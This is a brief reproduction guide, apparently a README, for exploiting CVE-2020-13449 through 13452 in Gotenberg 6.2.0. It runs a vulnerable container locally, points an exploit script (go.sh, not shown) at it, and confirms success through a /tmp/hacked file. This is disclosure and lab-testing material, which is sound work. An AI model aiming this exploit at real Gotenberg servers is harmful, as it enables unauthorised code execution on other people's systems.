Refer to CVE-2020-13449, CVE-2020-13450, CVE-2020-13451, CVE-2020-13452: https://sploit.tech/2020/12/29/Gotenberg.html
Write-up:
- Run gotenberg version 6.2.0 or earlier:
$ docker run --rm -p 3000:3000 --name gotenberg thecodingmachine/gotenberg:6.2.0- Execute the exploit with proper url:
$ ./go.sh http://localhsot:3000-
Grab a coffee and wait.
-
When script prints "Executed!" message you can check the /tmp/hacked file, check if it's there:
$ docker exec gotenberg bash -c "cat /tmp/hacked"